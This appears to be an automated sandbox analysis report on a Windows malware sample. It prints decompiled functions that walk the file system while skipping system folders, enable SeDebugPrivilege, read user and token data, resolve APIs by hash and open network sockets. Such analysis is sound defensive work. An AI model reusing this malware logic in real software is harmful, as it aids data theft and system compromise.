                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 017BE56A, Relevance: .2, Instructions: 223COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.363085208.00000000017B0000.00000040.00000001.sdmp, Offset: 017B0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8071370358a268ec56ced74f425ee8367d233470b51d20688c84ee7977d490ab
                                              • Instruction ID: 92248ea5f204eb1caac8ffca6ec374a5a6700ed183d9dcb915eb2437f3f336b3
                                              • Opcode Fuzzy Hash: 8071370358a268ec56ced74f425ee8367d233470b51d20688c84ee7977d490ab
                                              • Instruction Fuzzy Hash: 30C14EB181A7668BF720CF64E9881897B71FB85328F528309D1616FAD8D7B814CACF45
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC5F28, Relevance: .1, Instructions: 65COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 90f3a31cf44226d7b45905756bd417f7592a2a244c4b117fab9c4f9f9dcb1f77
                                              • Instruction ID: a68cc200de11d8213a2de58d1eb3837d3a84cd8a7dafbb9e1d39c8504a54a995
                                              • Opcode Fuzzy Hash: 90f3a31cf44226d7b45905756bd417f7592a2a244c4b117fab9c4f9f9dcb1f77
                                              • Instruction Fuzzy Hash: EA11FCB1D056089BEB08CFABD9401EEFBF7AFC9300F14C07AD924BA254DB3445428B65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07AC5F38, Relevance: .1, Instructions: 57COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.369889414.0000000007AC0000.00000040.00000001.sdmp, Offset: 07AC0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8aa3dbba9e6e8837593c57ee54151b85b84a63a3016347059720250701a7487c
                                              • Instruction ID: 25275fc8d8dd4611e54f5ac0ff31214f7deb15563826a425f495dddf90e60e27
                                              • Opcode Fuzzy Hash: 8aa3dbba9e6e8837593c57ee54151b85b84a63a3016347059720250701a7487c
                                              • Instruction Fuzzy Hash: E211C8B1D15608ABEB0CCFABD9405AEFAF7AFC9300F14D039D929BA214EB3455118F55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Analysis Process: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe PID: 4852 Parent PID: 7108 SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCOMMON

                                              Executed Functions

                                              Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 85%
                                              			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}




















                                              0x00403d82
                                              0x00403d88
                                              0x00403d8c
                                              0x00403d8d
                                              0x00403d90
                                              0x00403ea9
                                              0x00403ea9
                                              0x00403eb9
                                              0x00403ebb
                                              0x00403ec0
                                              0x00403f95
                                              0x00403f95
                                              0x00000000
                                              0x00403f95
                                              0x00403ece
                                              0x00403edb
                                              0x00403edd
                                              0x00403ee2
                                              0x00403f8e
                                              0x00403f8f
                                              0x00000000
                                              0x00403f94
                                              0x00000000
                                              0x00403ee8
                                              0x00403ef8
                                              0x00403f0a
                                              0x00403f12
                                              0x00403f18
                                              0x00403f26
                                              0x00403f28
                                              0x00403f2d
                                              0x00000000
                                              0x00000000
                                              0x00403f33
                                              0x00403f76
                                              0x00403f7c
                                              0x00000000
                                              0x00403f83
                                              0x00403f36
                                              0x00403f3a
                                              0x00000000
                                              0x00403f40
                                              0x00403f0c
                                              0x00403f10
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00403f41
                                              0x00403f41
                                              0x00403f4b
                                              0x00403f58
                                              0x00403f5c
                                              0x00403f88
                                              0x00000000
                                              0x00403f8d
                                              0x00403f60
                                              0x00000000
                                              0x00403f60
                                              0x00403ef8
                                              0x00403ee8
                                              0x00403da3
                                              0x00403da9
                                              0x00403ea6
                                              0x00403ea8
                                              0x00000000
                                              0x00403ea8
                                              0x00403db7
                                              0x00403dc4
                                              0x00403dc6
                                              0x00403dcb
                                              0x00403e9d
                                              0x00403e9e
                                              0x00403ea4
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00403dd1
                                              0x00403dd1
                                              0x00403dd8
                                              0x00000000
                                              0x00000000
                                              0x00403de2
                                              0x00403e12
                                              0x00403e22
                                              0x00403e30
                                              0x00403e36
                                              0x00403e3f
                                              0x00403e44
                                              0x00403e47
                                              0x00403e4a
                                              0x00403e4c
                                              0x00000000
                                              0x00000000
                                              0x00403e63
                                              0x00403e65
                                              0x00403e6a
                                              0x00403e6f
                                              0x00403f64
                                              0x00403f6a
                                              0x00000000
                                              0x00403f71
                                              0x00000000
                                              0x00403e6f
                                              0x00403e26
                                              0x00403e27
                                              0x00403e2e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00403e2e
                                              0x00403dea
                                              0x00403df9
                                              0x00000000
                                              0x00000000
                                              0x00403e01
                                              0x00403e10
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00403e75
                                              0x00403e7f
                                              0x00403e8c
                                              0x00403e8e
                                              0x00403e97
                                              0x00000000

                                              APIs
                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                              • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                              • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                              • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$FirstNext
                                              • String ID: %s\%s$%s\*$Program Files$Windows
                                              • API String ID: 1690352074-2009209621
                                              • Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                                              • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                              • Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                                              • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                                              0x00406512
                                              0x00406514
                                              0x00406522
                                              0x00406524
                                              0x00406530
                                              0x00406534
                                              0x0040653f
                                              0x0040654e
                                              0x00406552
                                              0x0040655a
                                              0x0040655f
                                              0x0040656d
                                              0x00406570
                                              0x00406573
                                              0x0040657a
                                              0x00406589
                                              0x0040658d
                                              0x00406590
                                              0x00406594
                                              0x00000000
                                              0x0040659a
                                              0x004065a1

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 3615134276-2896544425
                                              • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                              • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                              • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                              • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                                              0x00402b8c
                                              0x00402b92
                                              0x00402b96
                                              0x00402b9e
                                              0x00402ba3
                                              0x00402baa

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                              • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocateProcess
                                              • String ID:
                                              • API String ID: 1357844191-0
                                              • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                              • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                              • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                              • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                                              0x00406077
                                              0x00406082
                                              0x00406085

                                              APIs
                                              • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: NameUser
                                              • String ID:
                                              • API String ID: 2645101109-0
                                              • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                              • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                              • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                              • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: recv
                                              • String ID:
                                              • API String ID: 1507349165-0
                                              • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                              • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                              • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                              • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004061C3, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 75%
                                              			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}


























                                              0x004061c3
                                              0x004061cb
                                              0x004061cd
                                              0x004061d0
                                              0x004061de
                                              0x004061e0
                                              0x004061e5
                                              0x004061e9
                                              0x004061eb
                                              0x004061ed
                                              0x004061f2
                                              0x0040622a
                                              0x00406230
                                              0x00406235
                                              0x00406239
                                              0x0040623b
                                              0x00406244
                                              0x00406249
                                              0x00406249
                                              0x0040624c
                                              0x00406253
                                              0x00406256
                                              0x00406258
                                              0x00406261
                                              0x00406266
                                              0x00406266
                                              0x00406270
                                              0x00406273
                                              0x00406276
                                              0x0040627b
                                              0x0040627e
                                              0x0040628c
                                              0x0040628e
                                              0x00406290
                                              0x00406295
                                              0x0040629a
                                              0x0040629e
                                              0x004062a0
                                              0x004062ac
                                              0x004062af
                                              0x004062b7
                                              0x004062b9
                                              0x004062c9
                                              0x004062e0
                                              0x004062e2
                                              0x004062e4
                                              0x004062f3
                                              0x004062f3
                                              0x004062e4
                                              0x004062f8
                                              0x004062fd
                                              0x004062a0
                                              0x004062fe
                                              0x00406302
                                              0x00406307
                                              0x0040630c
                                              0x0040630d
                                              0x0040630f
                                              0x00406312
                                              0x00406317
                                              0x00406318
                                              0x0040631c
                                              0x0040631e
                                              0x00406321
                                              0x00406326
                                              0x00000000
                                              0x00406327
                                              0x004061f4
                                              0x004061ff
                                              0x00406208
                                              0x00406218
                                              0x0040621d
                                              0x00406224
                                              0x00406226
                                              0x00406228
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406228
                                              0x00406201
                                              0x00000000

                                              APIs
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                              • _wmemset.LIBCMT ref: 00406244
                                              • _wmemset.LIBCMT ref: 00406261
                                              • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: _wmemset$ErrorInformationLastToken
                                              • String ID: IDA$IDA
                                              • API String ID: 487585393-2020647798
                                              • Opcode ID: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
                                              • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                              • Opcode Fuzzy Hash: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
                                              • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 37%
                                              			E00404E17(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void _v40;
				void* _t23;
				signed int _t24;
				signed int* _t25;
				signed int _t30;
				signed int _t31;
				signed int _t33;
				signed int _t41;
				void* _t42;
				signed int* _t43;

				_v8 = _v8 & 0x00000000;
				_t33 = 8;
				memset( &_v40, 0, _t33 << 2);
				_v32 = 1;
				_t23 =  &_v40;
				_v28 = 6;
				_v36 = 2;
				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
				if(_t23 == 0) {
					_t24 = E00402B7C(4);
					_t43 = _t24;
					_t31 = _t30 | 0xffffffff;
					 *_t43 = _t31;
					_t41 = _v8;
					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
					 *_t43 = _t24;
					if(_t24 != _t31) {
						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
						if(_t24 == _t31) {
							E00404DE5(_t24,  *_t43);
							 *_t43 = _t31;
						}
						__imp__freeaddrinfo(_v8);
						if( *_t43 != _t31) {
							_t25 = _t43;
							goto L10;
						} else {
							E00402BAB(_t43);
							L8:
							_t25 = 0;
							L10:
							return _t25;
						}
					}
					E00402BAB(_t43);
					__imp__freeaddrinfo(_v8);
					goto L8;
				}
				return 0;
			}

















                                              0x00404e1d
                                              0x00404e26
                                              0x00404e2a
                                              0x00404e2f
                                              0x00404e37
                                              0x00404e3a
                                              0x00404e45
                                              0x00404e4f
                                              0x00404e57
                                              0x00404e61
                                              0x00404e66
                                              0x00404e68
                                              0x00404e6c
                                              0x00404e6e
                                              0x00404e7a
                                              0x00404e80
                                              0x00404e84
                                              0x00404e9f
                                              0x00404ea7
                                              0x00404eab
                                              0x00404eb1
                                              0x00404eb1
                                              0x00404eb6
                                              0x00404ebe
                                              0x00404ecb
                                              0x00000000
                                              0x00404ec0
                                              0x00404ec1
                                              0x00404ec7
                                              0x00404ec7
                                              0x00404ecd
                                              0x00000000
                                              0x00404ece
                                              0x00404ebe
                                              0x00404e87
                                              0x00404e90
                                              0x00000000
                                              0x00404e90
                                              0x00000000

                                              APIs
                                              • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                              • socket.WS2_32(?,?,?), ref: 00404E7A
                                              • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: freeaddrinfogetaddrinfosocket
                                              • String ID:
                                              • API String ID: 2479546573-0
                                              • Opcode ID: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
                                              • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                              • Opcode Fuzzy Hash: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
                                              • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004040BB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 74%
                                              			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				long _v16;
				void* __ebx;
				void* __edi;
				void* _t16;
				intOrPtr* _t25;
				long* _t28;
				void* _t30;
				int _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t42;
				intOrPtr _t43;
				long _t44;
				struct _OVERLAPPED* _t46;

				_t46 = 0;
				_t35 = 0;
				E004031E5(0, 0, 0xe9fabb88, 0, 0);
				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t42 = _t16;
				_v8 = _t42;
				if(_t42 == 0xffffffff) {
					__eflags = _a12;
					if(_a12 == 0) {
						L10:
						return _t35;
					}
					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
					__eflags = _t43;
					if(_t43 == 0) {
						goto L10;
					}
					_push(0);
					__eflags = E00403C59(_a4, _t43);
					if(__eflags != 0) {
						_v8 = 0;
						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
						_push(_t43);
						 *_a8 = _v8;
						E00403D44();
					}
					E00402BAB(_t43);
					return _t46;
				}
				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
				_t44 =  *_t25(_t42,  &_v12);
				if(_v12 != 0 || _t44 > 0x40000000) {
					L8:
					_t45 = _v8;
					goto L9;
				} else {
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 = _t44;
					}
					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
					_t35 = _t30;
					if(_t35 == 0) {
						goto L8;
					} else {
						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
						_t45 = _v8;
						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
						if(_t32 == 0) {
							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
							 *_t33(_t35, _t46, 0x8000);
							_t35 = _t46;
						}
						L9:
						E00403C40(_t45); // executed
						goto L10;
					}
				}
			}



















                                              0x004040c4
                                              0x004040ce
                                              0x004040d0
                                              0x004040e8
                                              0x004040ea
                                              0x004040ec
                                              0x004040f2
                                              0x0040418d
                                              0x00404190
                                              0x00404184
                                              0x00000000
                                              0x00404184
                                              0x004041a0
                                              0x004041a5
                                              0x004041a7
                                              0x00000000
                                              0x00000000
                                              0x004041a9
                                              0x004041b6
                                              0x004041b8
                                              0x004041be
                                              0x004041cb
                                              0x004041d0
                                              0x004041d1
                                              0x004041d3
                                              0x004041d8
                                              0x004041dc
                                              0x00000000
                                              0x004041e2
                                              0x00404100
                                              0x0040410c
                                              0x00404111
                                              0x0040417a
                                              0x0040417a
                                              0x00000000
                                              0x0040411b
                                              0x0040411b
                                              0x00404120
                                              0x00404122
                                              0x00404122
                                              0x0040412c
                                              0x0040413a
                                              0x0040413c
                                              0x00404140
                                              0x00000000
                                              0x00404142
                                              0x0040414a
                                              0x00404155
                                              0x0040415a
                                              0x0040415e
                                              0x00404168
                                              0x00404174
                                              0x00404176
                                              0x00404176
                                              0x0040417d
                                              0x0040417e
                                              0x00000000
                                              0x00404183
                                              0x00404140

                                              APIs
                                              • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
